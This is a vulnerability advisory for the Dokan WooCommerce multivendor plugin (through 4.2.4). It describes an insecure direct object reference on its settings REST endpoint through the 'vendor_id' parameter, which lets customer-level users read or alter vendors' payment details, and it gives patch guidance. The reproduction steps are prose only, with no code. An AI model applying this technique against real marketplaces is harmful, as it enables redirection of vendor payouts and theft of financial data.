Dokan WooCommerce Multivendor Marketplace Plugin Insecure Direct Object Reference Vulnerability

A vulnerability allowing Insecure Direct Object Reference (IDOR) has been identified in the Dokan: AI Powered WooCommerce Multivendor Marketplace Solution plugin for WordPress, affecting versions through 4.2.4. The vulnerability exists in the '/wp-json/dokan/v1/settings' REST API endpoint, where insufficient validation on user-controlled keys allows authenticated attackers with customer-level permissions or higher to access or modify other vendors' store settings. This includes sensitive payment information such as PayPal emails, bank account details, routing numbers, IBANs, SWIFT codes, as well as phone numbers and addresses. Exploitation could involve changing PayPal email addresses to ones controlled by the attacker, facilitating financial theft during marketplace payout processes.

Impact

Successful exploitation allows for unauthorized access to and modification of other vendors' store settings, including sensitive payment information and personal details, with potential for financial theft through manipulated PayPal transactions.

Reproduction

To reproduce this vulnerability, an authenticated user with customer-level permissions can send a request to the '/wp-json/dokan/v1/settings' endpoint without the necessary validation on the 'vendor_id' parameter. This can be done using a tool like Postman or through custom code that interacts with the WordPress REST API. The absence of proper validation allows the user to access or modify settings of other vendors, including sensitive payment information and personal details.

Remediation

Users are advised to update the Dokan plugin to version 4.2.5 or later, where this vulnerability has been patched.